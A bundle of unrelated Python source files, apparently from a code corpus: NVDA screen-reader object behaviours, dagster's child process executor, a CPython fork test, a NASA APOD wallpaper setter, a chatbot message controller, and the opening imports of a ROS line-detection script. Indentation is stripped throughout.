These events are queued from NVDA's global keyboard hook.
Therefore, an event is fired for every single character that is being typed,
even when a character is not written to the console (e.g. in read only console applications).
This approach is an alternative to monitoring the console output for
characters close to the caret, or injecting in-process with NVDAHelper.
This class relies on the toUnicodeEx Windows function, and in particular
the flag to preserve keyboard state available in Windows 10 1607
and later."""
#: Whether this object quickly and reliably sends textChange events
#: when its contents update.
#: Timely and reliable textChange events are required
#: to support password suppression.
_supportsTextChange = True
#: A queue of typed characters, to be dispatched on C{textChange}.
#: This queue allows NVDA to suppress typed passwords when needed.
_queuedChars = []
#: Whether the last typed character is a tab.
#: If so, we should temporarily disable filtering as completions may
#: be short.
_hasTab = False
def _reportNewLines(self, lines):
# Perform typed character filtering, as typed characters are handled with events.
if (
len(lines) == 1
and not self._hasTab
and len(lines[0].strip()) < max(len(speech.curWordChars) + 1, 3)
):
return
super()._reportNewLines(lines)
def event_typedCharacter(self, ch):
if ch == '\t':
self._hasTab = True
# Clear the typed word buffer for tab completion.
speech.clearTypedWordBuffer()
else:
self._hasTab = False
if (
(
config.conf['keyboard']['speakTypedCharacters']
or config.conf['keyboard']['speakTypedWords']
)
and not config.conf['terminals']['speakPasswords']
and self._supportsTextChange
):
self._queuedChars.append(ch)
else:
super().event_typedCharacter(ch)
def event_textChange(self):
self._dispatchQueue()
super().event_textChange()
@script(gestures=[
"kb:enter",
"kb:numpadEnter",
"kb:tab",
"kb:control+c",
"kb:control+d",
"kb:control+pause"
])
def script_flush_queuedChars(self, gesture):
"""
Flushes the typed word buffer and queue of typedCharacter events if present.
Since these gestures clear the current word/line, we should flush the
queue to avoid erroneously reporting these chars.
"""
self._queuedChars = []
speech.clearTypedWordBuffer()
gesture.send()
def _calculateNewText(self, newLines, oldLines):
hasNewLines = (
self._findNonBlankIndices(newLines)
!= self._findNonBlankIndices(oldLines)
)
if hasNewLines:
# Clear the typed word buffer for new text lines.
speech.clearTypedWordBuffer()
self._queuedChars = []
return super()._calculateNewText(newLines, oldLines)
def _dispatchQueue(self):
"""Sends queued typedCharacter events through to NVDA."""
while self._queuedChars:
ch = self._queuedChars.pop(0)
super().event_typedCharacter(ch)
def _findNonBlankIndices(self, lines):
"""
Given a list of strings, returns a list of indices where the strings
are not empty.
"""
return [index for index, line in enumerate(lines) if line]
class CandidateItem(NVDAObject):
def getFormattedCandidateName(self,number,candidate):
if config.conf["inputComposition"]["alwaysIncludeShortCharacterDescriptionInCandidateName"]:
describedSymbols=[]
for symbol in candidate:
try:
symbolDescriptions=characterProcessing.getCharacterDescription(speech.getCurrentLanguage(),symbol) or []
except TypeError:
symbolDescriptions=[]
if len(symbolDescriptions)>=1:
description=symbolDescriptions[0]
if description.startswith('(') and description.endswith(')'):
describedSymbols.append(description[1:-1])
else:
# Translators: a message announcing a candidate's character and description.
describedSymbols.append(_(u"{symbol} as in {description}").format(symbol=symbol,description=description))
else:
describedSymbols.append(symbol)
candidate=u", ".join(describedSymbols)
# Translators: a formatted message announcing a candidate's number and candidate text.
return _(u"{number} {candidate}").format(number=number,candidate=candidate)
def getFormattedCandidateDescription(self,candidate):
descriptions=[]
numSymbols=len(candidate) if candidate else 0
if numSymbols!=1: return u""
symbol=candidate[0]
try:
symbolDescriptions=characterProcessing.getCharacterDescription(speech.getCurrentLanguage(),symbol) or []
except TypeError:
symbolDescriptions=[]
if config.conf["inputComposition"]["alwaysIncludeShortCharacterDescriptionInCandidateName"]:
symbolDescriptions=symbolDescriptions[1:]
if len(symbolDescriptions)<1: return u""
return u", ".join(symbolDescriptions)
def reportFocus(self):
if not config.conf["inputComposition"]["announceSelectedCandidate"]: return
text=self.name
desc=self.description
if desc:
text+=u", "+desc
speech.speakText(text)
def _get_visibleCandidateItemsText(self):
obj=self
textList=[]
while isinstance(obj,CandidateItem) and isinstance(obj.candidateNumber,int) and controlTypes.STATE_INVISIBLE not in obj.states:
textList.append(obj.name)
obj=obj.previous
textList.reverse()
obj=self.next
while isinstance(obj,CandidateItem) and isinstance(obj.candidateNumber,int) and controlTypes.STATE_INVISIBLE not in obj.states:
textList.append(obj.name)
obj=obj.next
if len(textList)<=1: return None
self.visibleCandidateItemsText=(u", ".join(textList))+u", "
return self.visibleCandidateItemsText
class RowWithFakeNavigation(NVDAObject):
"""Provides table navigation commands for a row which doesn't support them natively.
The cells must be exposed as children and they must support the table cell properties.
"""
_savedColumnNumber = None
def _moveToColumn(self, obj):
if not obj:
ui.message(_("Edge of table"))
return
if obj is not self:
# Use the focused copy of the row as the parent for all cells to make comparison faster.
obj.parent = self
api.setNavigatorObject(obj)
speech.speakObject(obj, reason=controlTypes.REASON_FOCUS)
def _moveToColumnNumber(self, column):
child = column - 1
if child >= self.childCount:
return
cell = self.getChild(child)
self._moveToColumn(cell)
def script_moveToNextColumn(self, gesture):
cur = api.getNavigatorObject()
if cur == self:
new = self.simpleFirstChild
elif cur.parent != self:
new = self
else:
new = cur.simpleNext
self._moveToColumn(new)
script_moveToNextColumn.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToNextColumn.__doc__ = _("Moves the navigator object to the next column")
def script_moveToPreviousColumn(self, gesture):
cur = api.getNavigatorObject()
if cur == self:
new = None
elif cur.parent != self or not cur.simplePrevious:
new = self
else:
new = cur.simplePrevious
self._moveToColumn(new)
script_moveToPreviousColumn.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToPreviousColumn.__doc__ = _("Moves the navigator object to the previous column")
def reportFocus(self):
col = self._savedColumnNumber
if not col:
return super(RowWithFakeNavigation, self).reportFocus()
self.__class__._savedColumnNumber = None
self._moveToColumnNumber(col)
def _moveToRow(self, row):
if not row:
return self._moveToColumn(None)
nav = api.getNavigatorObject()
if nav != self and nav.parent == self:
self.__class__._savedColumnNumber = nav.columnNumber
row.setFocus()
def script_moveToNextRow(self, gesture):
self._moveToRow(self.next)
script_moveToNextRow.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToNextRow.__doc__ = _("Moves the navigator object and focus to the next row")
def script_moveToPreviousRow(self, gesture):
self._moveToRow(self.previous)
script_moveToPreviousRow.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToPreviousRow.__doc__ = _("Moves the navigator object and focus to the previous row")
__gestures = {
"kb:control+alt+rightArrow": "moveToNextColumn",
"kb:control+alt+leftArrow": "moveToPreviousColumn",
"kb:control+alt+downArrow": "moveToNextRow",
"kb:control+alt+upArrow": "moveToPreviousRow",
}
class RowWithoutCellObjects(NVDAObject):
"""An abstract class which creates cell objects for table rows which don't natively expose them.
Subclasses must override L{_getColumnContent} and can optionally override L{_getColumnHeader}
to retrieve information about individual columns.
The parent (table) must support the L{columnCount} property.
"""
def _get_childCount(self):
return self.parent.columnCount
def _getColumnLocation(self,column):
"""Get the screen location for the given column.
Subclasses may optionally override this method.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: tuple
"""
raise NotImplementedError
def _getColumnContent(self, column):
"""Get the text content for a given column of this row.
Subclasses must override this method.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: str
"""
raise NotImplementedError
def _getColumnHeader(self, column):
"""Get the header text for this column.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: str
"""
raise NotImplementedError
def _makeCell(self, column):
if column == 0 or column > self.childCount:
return None
return _FakeTableCell(parent=self, column=column)
def _get_firstChild(self):
return self._makeCell(1)
def _get_children(self):
return [self._makeCell(column) for column in range(1, self.childCount + 1)]
def getChild(self, index):
return self._makeCell(index + 1)
class _FakeTableCell(NVDAObject):
role = controlTypes.ROLE_TABLECELL
def __init__(self, parent=None, column=None):
super(_FakeTableCell, self).__init__()
self.parent = parent
self.columnNumber = column
try:
self.rowNumber = self.parent.positionInfo["indexInGroup"]
except KeyError:
pass
self.processID = parent.processID
try:
# HACK: Some NVDA code depends on window properties, even for non-Window objects.
self.windowHandle = parent.windowHandle
self.windowClassName = parent.windowClassName
self.windowControlID = parent.windowControlID
except AttributeError:
pass
def _get_next(self):
return self.parent._makeCell(self.columnNumber + 1)
def _get_previous(self):
return self.parent._makeCell(self.columnNumber - 1)
firstChild = None
def _get_location(self):
try:
return self.parent._getColumnLocation(self.columnNumber)
except NotImplementedError:
return None
def _get_name(self):
return self.parent._getColumnContent(self.columnNumber)
def _get_columnHeaderText(self):
return self.parent._getColumnHeader(self.columnNumber)
def _get_tableID(self):
return id(self.parent.parent)
def _get_states(self):
states = self.parent.states.copy()
if not self.location or self.location.width == 0:
states.add(controlTypes.STATE_INVISIBLE)
return states
class FocusableUnfocusableContainer(NVDAObject):
"""Makes an unfocusable container focusable using its first focusable descendant.
One instance where this is useful is ARIA applications on the web where the author hasn't set a tabIndex.
"""
isFocusable = True
def setFocus(self):
for obj in self.recursiveDescendants:
if obj.isFocusable:
obj.setFocus()
break
class ToolTip(NVDAObject):
"""Provides information about an item over which the user is hovering a cursor.
The object should fire a show event when it appears.
"""
role = controlTypes.ROLE_TOOLTIP
def event_show(self):
if not config.conf["presentation"]["reportTooltips"]:
return
speech.speakObject(self, reason=controlTypes.REASON_FOCUS)
# Ideally, we wouldn't use getBrailleTextForProperties directly.
braille.handler.message(braille.getBrailleTextForProperties(name=self.name, role=self.role))
class Notification(NVDAObject):
"""Informs the user of non-critical information that does not require immediate action.
This is primarily for notifications displayed in the system notification area, and for Windows 8 and later, toasts.
The object should fire a alert or show event when the user should be notified.
"""
def event_alert(self):
if not config.conf["presentation"]["reportHelpBalloons"]:
return
speech.speakObject(self, reason=controlTypes.REASON_FOCUS)
# Ideally, we wouldn't use getBrailleTextForProperties directly.
braille.handler.message(braille.getBrailleTextForProperties(name=self.name, role=self.role))
event_show = event_alert
class EditableTextWithSuggestions(NVDAObject):
"""Allows NvDA to announce appearance/disappearance of suggestions as text is entered.
This is used in various places, including Windows 10 search edit fields and others.
Subclasses should provide L{event_suggestionsOpened} and can optionally override L{event_suggestionsClosed}.
These events are fired when suggestions appear and disappear, respectively.
"""
def event_suggestionsOpened(self):
"""Called when suggestions appear when text is entered e.g. search suggestions.
Subclasses should provide custom implementations if possible.
By default NVDA will announce appearance of suggestions using speech, braille or a sound will be played.
"""
# Translators: Announced in braille when suggestions appear when search term is entered in various search fields such as Start search box in Windows 10.
braille.handler.message(_("Suggestions"))
if config.conf["presentation"]["reportAutoSuggestionsWithSound"]:
nvwave.playWaveFile(r"waves\suggestionsOpened.wav")
def event_suggestionsClosed(self):
"""Called when suggestions list or container is closed.
Subclasses should provide custom implementations if possible.
By default NVDA will announce this via speech, braille or via a sound.
"""
if config.conf["presentation"]["reportAutoSuggestionsWithSound"]:
nvwave.playWaveFile(r"waves\suggestionsClosed.wav")
class WebDialog(NVDAObject):
"""
A dialog that will use a treeInterceptor if its parent currently does.
This can be used to ensure that dialogs on the web get browseMode by default, unless inside an ARIA application
"""
def _get_shouldCreateTreeInterceptor(self):
if self.parent.treeInterceptor:
return True
return False
|
child_process_executor.py
|
"""Facilities for running arbitrary commands in child processes."""
import os
import queue
import sys
from abc import ABC, abstractmethod
from typing import NamedTuple
import dagster._check as check
from dagster.core.errors import DagsterExecutionInterruptedError
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from dagster.utils.interrupts import capture_interrupts
class ChildProcessEvent:
pass
class ChildProcessStartEvent(
NamedTuple("ChildProcessStartEvent", [("pid", int)]), ChildProcessEvent
):
pass
class ChildProcessDoneEvent(NamedTuple("ChildProcessDoneEvent", [("pid", int)]), ChildProcessEvent):
pass
class ChildProcessSystemErrorEvent(
NamedTuple(
"ChildProcessSystemErrorEvent", [("pid", int), ("error_info", SerializableErrorInfo)]
),
ChildProcessEvent,
):
pass
class ChildProcessCommand(ABC): # pylint: disable=no-init
"""Inherit from this class in order to use this library.
The object must be picklable; instantiate it and pass it to _execute_command_in_child_process."""
@abstractmethod
def execute(self):
"""This method is invoked in the child process.
Yields a sequence of events to be handled by _execute_command_in_child_process."""
class ChildProcessCrashException(Exception):
"""Thrown when the child process crashes."""
def __init__(self, exit_code=None):
self.exit_code = exit_code
super().__init__()
def _execute_command_in_child_process(event_queue, command):
"""Wraps the execution of a ChildProcessCommand.
Handles errors and communicates across a queue with the parent process."""
check.inst_param(command, "command", ChildProcessCommand)
with capture_interrupts():
pid = os.getpid()
event_queue.put(ChildProcessStartEvent(pid=pid))
try:
for step_event in command.execute():
event_queue.put(step_event)
event_queue.put(ChildProcessDoneEvent(pid=pid))
except (
Exception,
KeyboardInterrupt,
DagsterExecutionInterruptedError,
):
event_queue.put(
ChildProcessSystemErrorEvent(
pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
TICK = 20.0 * 1.0 / 1000.0
"""The minimum interval at which to check for child process liveness -- default 20ms."""
PROCESS_DEAD_AND_QUEUE_EMPTY = "PROCESS_DEAD_AND_QUEUE_EMPTY"
"""Sentinel value."""
def _poll_for_event(process, event_queue):
try:
return event_queue.get(block=True, timeout=TICK)
except queue.Empty:
if not process.is_alive():
# There is a possibility that after the last queue.get the
# process created another event and then died. In that case
# we want to continue draining the queue.
try:
return event_queue.get(block=False)
except queue.Empty:
# If the queue empty we know that there are no more events
# and that the process has died.
return PROCESS_DEAD_AND_QUEUE_EMPTY
return None
def execute_child_process_command(multiprocessing_ctx, command):
"""Execute a ChildProcessCommand in a new process.
This function starts a new process whose execution target is a ChildProcessCommand wrapped by
_execute_command_in_child_process; polls the queue for events yielded by the child process
until the process dies and the queue is empty.
This function yields a complex set of objects to enable having multiple child process
executions in flight:
* None - nothing has happened, yielded to enable cooperative multitasking other iterators
* ChildProcessEvent - Family of objects that communicates state changes in the child process
* KeyboardInterrupt - Yielded in the case that an interrupt was recieved while
polling the child process. Yielded instead of raised to allow forwarding of the
interrupt to the child and completion of the iterator for this child and
any others that may be executing
* The actual values yielded by the child process command
Args:
multiprocessing_ctx: The multiprocessing context to execute in (spawn, forkserver, fork)
command (ChildProcessCommand): The command to execute in the child process.
Warning: if the child process is in an infinite loop, this will
also infinitely loop.
"""
check.inst_param(command, "command", ChildProcessCommand)
event_queue = multiprocessing_ctx.Queue()
try:
process = multiprocessing_ctx.Process(
target=_execute_command_in_child_process, args=(event_queue, command)
)
process.start()
completed_properly = False
while not completed_properly:
event = _poll_for_event(process, event_queue)
if event == PROCESS_DEAD_AND_QUEUE_EMPTY:
break
yield event
if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)):
completed_properly = True
if not completed_properly:
# TODO Figure out what to do about stderr/stdout
raise ChildProcessCrashException(exit_code=process.exitcode)
process.join()
finally:
event_queue.close()
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import threading
import time
import unittest
from test.fork_wait import ForkWait
from test.support import reap_children, get_attribute, verbose
# Skip test if fork does not exist.
get_attribute(os, 'fork')
if sys._built_with_asan:
raise unittest.SkipTest("ASAN deadlocks post fork in several test suites")
class ForkTest(ForkWait):
def wait_impl(self, cpid):
deadline = time.monotonic() + 10.0
while time.monotonic() <= deadline:
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(0.1)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def tearDownModule():
reap_children()
if __name__ == "__main__":
unittest.main()
|
manual_wallpaper_changer.py
|
from tkinter import *
from tkcalendar import DateEntry
from datetime import date
from datetime import timedelta
from win10toast import ToastNotifier
import apod_object_parser
import wallpaper_utility
import threading
def setWallpaperByDate(cal):
disableButtons()
response = apod_object_parser.get_data_by_date( wallpaper_utility.APOD_API_KEY, cal.get_date() )
hd_url = setResultAndGetHdUrl(response)
image_date = apod_object_parser.get_date(response)
setWallpaperByHdUrl(hd_url, image_date)
enableButtons()
exit()
def setWallpaperByDateThreaded(cal):
print("setting wallpaper by date")
e = threading.Event()
t = threading.Thread(target=setWallpaperByDate, args=(cal,))
t.start()
# t.join(30)
# if t.is_alive:
# result.set("request timed out")
# e.set()
# t.join()
def setTodaysPicAsWalpaper():
disableButtons()
response = apod_object_parser.get_data(wallpaper_utility.APOD_API_KEY)
hd_url = setResultAndGetHdUrl(response)
image_date = apod_object_parser.get_date(response)
setWallpaperByHdUrl(hd_url, image_date)
enableButtons()
exit()
def setTodaysPicAsWalpaperThreaded():
e = threading.Event()
t = threading.Thread(target=setTodaysPicAsWalpaper)
t.start()
# t.join(30)
# if t.is_alive:
# result.set("request timed out")
# e.set()
# t.join()
# user define function
def setResultAndGetHdUrl(response):
try:
print("Sending request")
hd_url = apod_object_parser.get_hdurl(response)
print("Request received")
result.set("url received! :)")
return hd_url
except:
result.set("This date's post is not a image :(")
return None
def setWallpaperByHdUrl(hd_url, image_date):
print(" hd_url's image date: "+image_date)
if (hd_url != None):
image_downloaded_path = apod_object_parser.download_image(hd_url, image_date)
wallpaper_utility.changeBG(image_downloaded_path)
result.set("success! :)")
n.show_toast(wallpaper_utility.SERVICE_NAME, "Wallpaper changed!", duration = 7,)
def disableButtons():
setButton["state"] = "disabled"
useTodaysPic["state"] = "disabled"
def enableButtons():
setButton["state"] = "normal"
useTodaysPic["state"] = "normal"
root = Tk()
root.title("NASA APOD Image Setter")
root.configure(bg='light grey')
n = ToastNotifier()
result = StringVar()
path = StringVar()
Label(root, text="Status : ", bg = "light grey").grid(row=3, sticky=W)
Label(root, text="",textvariable=result, bg = "light grey").grid(row=3, column=1, sticky=W)
yesterdayDate = date.today() - timedelta(days=1)
cal = DateEntry(root, maxdate = yesterdayDate, date_pattern='dd/mm/yyyy')
cal.grid(row = 0, column = 2, columnspan=2, rowspan=2, padx=5, pady=5,)
setButton = Button(root, text="Set as wallpaper", command= lambda : setWallpaperByDateThreaded(cal), bg="white")
setButton.grid(row=2, column=2, columnspan=2, rowspan=2, padx=5, pady=5,)
useTodaysPic = Button(root, text="use today's Pic", command= setTodaysPicAsWalpaperThreaded, bg="white")
useTodaysPic.grid(row=4, column=2, columnspan=2, rowspan=2, padx=5, pady=5,)
Label( root, text = "Choose a day from when you need the pic from:", bg="light grey" ).grid(row=0, sticky=W)
mainloop()
|
controller.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import sys
from threading import Thread
from types import LambdaType
from apscheduler.schedulers.background import BackgroundScheduler
from typing import Optional, List
from typing import Text
from conversationinsights.actions.action import ActionListen, ActionRestart
from conversationinsights.channels import UserMessage
from conversationinsights.channels.direct import CollectingOutputChannel
from conversationinsights.dispatcher import Dispatcher
from conversationinsights.domain import Domain
from conversationinsights.events import Restart, Reminder
from conversationinsights.events import UserUtterance, ExecutedAction
from conversationinsights.interpreter import NaturalLanguageInterpreter
from conversationinsights.interpreter import RegexInterpreter
from conversationinsights.policies.ensemble import PolicyEnsemble
from conversationinsights.tracker_store import TrackerStore
from conversationinsights.trackers import DialogueStateTracker
scheduler = BackgroundScheduler()
scheduler.start()
try:
# noinspection PyCompatibility
from Queue import Queue, Empty
except ImportError:
# noinspection PyCompatibility
from queue import Queue, Empty
logger = logging.getLogger(__name__)
class MessageQueue(object):
def enqueue(self, message):
# type: (UserMessage) -> None
"""Add a message to the queue."""
raise NotImplementedError
def dequeue(self):
# type: () -> Optional[UserMessage]
"""Remove a message from the queue."""
raise NotImplementedError
class InMemoryMessageQueue(MessageQueue):
def __init__(self):
self.queue = Queue()
def enqueue(self, message):
# type: (UserMessage) -> None
"""Add a message to the queue to be handled."""
self.queue.put(message)
def dequeue(self):
# type: () -> Optional[UserMessage]
"""Remove a message from the queue (the one who removes it should also handle it!)"""
try:
return self.queue.get(block=True)
except Empty:
return None
def join(self):
# type: () -> None
"""Wait until all messages in the queue have been processed."""
self.queue.join()
class Controller(object):
def __init__(self, interpreter, policy_ensemble, domain, tracker_store, message_preprocessor=None):
# type: (NaturalLanguageInterpreter, PolicyEnsemble, Domain, TrackerStore, Optional[LambdaType]) -> None
self.tracker_store = tracker_store
self.domain = domain
self.policy_ensemble = policy_ensemble
self.interpreter = interpreter
self.threads = []
self.message_preprocessor = message_preprocessor
def handle_asynchronous(self, input_channel=None, message_queue=None, num_processing_threads=1):
# type: (InputChannel, Dequeue, int) -> None
"""Handle the messages coming from the input channel asynchronously in child threads.
Spawns a number of threads to handle the messages that reach the input channel."""
if message_queue is None:
message_queue = InMemoryMessageQueue()
# hook up input channel
if input_channel is not None:
listener_thread = Thread(target=input_channel.start_async_listening, args=[message_queue])
listener_thread.daemon = True
listener_thread.start()
self.threads.append(listener_thread)
# create message processors
for i in range(0, num_processing_threads):
message_processor = self.create_processor()
processor_thread = Thread(target=message_processor.handle_channel_asynchronous, args=[message_queue])
processor_thread.daemon = True
processor_thread.start()
self.threads.append(processor_thread)
def handle_channel(self, input_channel=None):
# type: (InputChannel) -> None
"""Handle messages coming from the channel."""
message_processor = self.create_processor()
message_processor.handle_channel(input_channel)
def handle_message(self, message):
# type: (UserMessage) -> Optional[List[Text]]
"""Handle a single messages with a processor."""
message_processor = self.create_processor()
return message_processor.handle_message(message)
def serve_forever(self):
# type: () -> None
"""Block until all child threads have been terminated."""
while len(self.threads) > 0:
try:
# Join all threads using a timeout so it doesn't block
# Filter out threads which have been joined or are None
[t.join(1000) for t in self.threads]
self.threads = [t for t in self.threads if t.isAlive()]
except KeyboardInterrupt:
logger.info("Ctrl-c received! Sending kill to threads...")
# It would be better at this point to properly shutdown every thread (e.g. by setting a flag on it)
# Unfortunately, there are IO operations that are blocking without a timeout (e.g. sys.read)
# so threads that are waiting for one of these calls can't check the set flag. Hence, we go the easy
# route for now
sys.exit(0)
logger.info("Finished waiting for input threads to terminate. Stopping to serve forever.")
def create_processor(self):
# type: () -> MessageProcessor
"""Create a message processor for the message handling."""
return MessageProcessor(self.interpreter, self.policy_ensemble, self.domain, self.tracker_store,
message_preprocessor=self.message_preprocessor)
class MessageProcessor(object):
def __init__(self,
interpreter,
policy_ensemble,
domain,
tracker_store,
max_number_of_predictions=10,
message_preprocessor=None,
on_circuit_break=None):
# type: (NaturalLanguageInterpreter, PolicySelector, Domain, TrackerStore, int, LambdaType, LambdaType) -> None
self.interpreter = interpreter
self.policy_ensemble = policy_ensemble
self.domain = domain
self.tracker_store = tracker_store
self.max_number_of_predictions = max_number_of_predictions
self.on_circuit_break = on_circuit_break
self.message_preprocessor = message_preprocessor
def handle_channel(self, input_channel=None):
# type: (InputChannel) -> None
"""Handles the input channel synchronously. Each message gets processed directly after it got received."""
input_channel.start_sync_listening(self.handle_message)
def handle_channel_asynchronous(self, message_queue):
"""Handles incoming messages from the message queue.
An input channel should add messages to the queue asynchronously."""
while True:
message = message_queue.dequeue()
if message is None:
continue
self.handle_message(message)
def handle_message(self, message):
# type: (UserMessage) -> Optional[List[Text]]
"""Handle a single message with this processor."""
# preprocess message if necessary
if self.message_preprocessor is not None:
message.text = self.message_preprocessor(message.text)
# we have a Tracker instance for each user
# which maintains conversation state
tracker = self._get_tracker(message.sender_id)
self._handle_message_with_tracker(message, tracker)
self._predict_and_execute_next_action(message, tracker)
# save tracker state to continue conversation from this state
self._save_tracker(tracker)
if isinstance(message.output_channel, CollectingOutputChannel):
return [outgoing_message for sender, outgoing_message in message.output_channel.messages]
else:
return None
def handle_reminder(self, reminder_event, dispatcher):
# type: (Reminder, Dispatcher) -> None
"""Handle a reminder that is triggered asynchronously."""
def has_message_after_reminder(tracker):
"""If the user sent a message after the reminder got scheduled - it might be better to cancel it."""
for e in reversed(tracker.events):
if isinstance(e, Reminder) and e.id == reminder_event.id:
return False
elif isinstance(e, UserUtterance):
return True
return True # tracker has probably been restarted
tracker = self._get_tracker(dispatcher.sender)
if reminder_event.kill_on_user_message and has_message_after_reminder(tracker):
logger.debug("Canceled reminder because it is outdated. (event: {} id: {})".format(
reminder_event.action_name, reminder_event.id))
else:
# necessary for proper featurization, otherwise the previous unrelated message would influence featurization
tracker.log_event(UserUtterance.empty())
should_continue = self._run_action(
self.domain.action_for_name(reminder_event.action_name), tracker, dispatcher)
if should_continue:
self._predict_and_execute_next_action(
UserMessage(None, dispatcher.output_channel, dispatcher.sender), tracker)
# save tracker state to continue conversation from this state
self._save_tracker(tracker)
def _parse_message(self, message):
# for testing - you can short-cut the NLU part with a message
# in the format _intent[entity1=val1,entity=val2]
# parse_data is a dict of intent & entities
if message.text.startswith('_'):
parse_data = RegexInterpreter().parse(message.text)
else:
parse_data = self.interpreter.parse(message.text)
logger.debug("Received user message '{}' with intent '{}' and entities '{}'".format(
message.text, parse_data["intent"], parse_data["entities"]))
return parse_data
def _handle_message_with_tracker(self, message, tracker):
# type: (UserMessage, DialogueStateTracker) -> None
parse_data = self._parse_message(message)
# We don't ever directly mutate the tracker, but instead pass it events to log.
tracker.log_event(UserUtterance(message.text, parse_data["intent"], parse_data["entities"], parse_data))
# first thing that will be done before the action loop is to store all entities as slots
for e in self.domain.slots_for_entities(parse_data["entities"]):
tracker.log_event(e)
logger.debug("Logged UserUtterance - tracker now has {} events".format(len(tracker.events)))
def _should_handle_message(self, tracker):
return not tracker.paused or tracker.latest_message.intent.get("name") == self.domain.restart_intent
def _predict_and_execute_next_action(self, message, tracker):
# this will actually send the response to the user
dispatcher = Dispatcher(message.sender_id, message.output_channel, self.domain)
# We will keep taking actions decided by the policy until it chooses to 'listen'
should_predict_another_action = True
number_of_predicted_actions = 0
# Log currently set slots
logger.debug("Current slot values: \n" +
"\n".join(["\t{}: {}".format(s.name, s.value) for s in tracker.slots.values()]))
# action loop. predicts actions until we hit the "listen for user input" action
while self._should_handle_message(tracker) and \
should_predict_another_action and \
number_of_predicted_actions < self.max_number_of_predictions:
# this actually just calls the policy's method by the same name
action = self._get_next_action(tracker)
should_predict_another_action = self._run_action(action, tracker, dispatcher)
number_of_predicted_actions += 1
if number_of_predicted_actions == self.max_number_of_predictions and should_predict_another_action:
# circuit breaker was tripped
logger.warn("Circuit breaker tripped. Stopped predicting more actions for sender '{}'".format(
tracker.sender_id))
if self.on_circuit_break:
self.on_circuit_break(tracker, dispatcher) # calls the cicuit breaking callback
logger.debug("Current topic: {}".format(tracker.topic_stack.top.name))
def _should_predict_another_action(self, action, events):
is_listen_action = isinstance(action, ActionListen)
contains_restart = events and isinstance(events[0], Restart)
return not is_listen_action and not contains_restart
def _schedule_reminder(self, reminder, tracker, dispatcher):
# type: (Reminder, DialogueStateTracker, Dispatcher) -> None
"""Uses the scheduler to time a job to trigger the passed reminder.
Reminders with the same `id` property will overwrite one another (i.e. only one of them will eventually run)."""
scheduler.add_job(self.handle_reminder, 'date', run_date=reminder.trigger_date_time,
args=[reminder, dispatcher], id=reminder.id, replace_existing=True)
def _run_action(self, action, tracker, dispatcher):
# events and return values are used to update
# the tracker state after an action has been taken
events = action.run(dispatcher, tracker, self.domain)
# Ensures that the code still works even if a lazy programmer missed to type `return []`
# at the end of an action or the run method returns `None` for some other reason
if events is None:
events = []
logger.debug("Action '{}' ended with events '{}'".format(
action.name(), ['{}'.format(e) for e in events]))
# log the action and its produced events
tracker.log_event(ExecutedAction(action.id_str()))
if events: # prevents failure if an action doesnt return `[]` but `None`
for e in events:
tracker.log_event(e)
if isinstance(e, Reminder):
self._schedule_reminder(e, tracker, dispatcher)
return self._should_predict_another_action(action, events)
def _get_tracker(self, sender):
# type: (Text) -> DialogueStateTracker
sender_id = sender or UserMessage.DEFAULT_SENDER
tracker = self.tracker_store.get_or_create_tracker(sender_id)
return tracker
def _save_tracker(self, tracker):
self.tracker_store.save(tracker)
def _get_next_action(self, tracker):
follow_up_action = tracker.follow_up_action
if follow_up_action:
tracker.clear_follow_up_action()
if self.domain.index_for_action(follow_up_action.id_str()) is not None:
return follow_up_action
else:
logger.error("Trying to run unknown follow up action '{}'!".format(follow_up_action) +
"Instead of running that, we will ignore the action and predict the next action ourself.")
if tracker.latest_message.intent.get("name") == self.domain.restart_intent:
return ActionRestart()
idx = self.policy_ensemble.predict_next_action(tracker, self.domain)
return self.domain.action_for_index(idx)
|
sunny_new_line_detect_simple_gazebo.py
|
#!/usr/bin/env python
from cv_bridge import CvBridge, CvBridgeError
from duckietown_utils.jpg import image_cv_from_jpg #location:f23-LED/led_detection/include
import threading
import rospy
import numpy as np
import cv2
import math
from sensor_msgs.msg import CompressedImage, Image
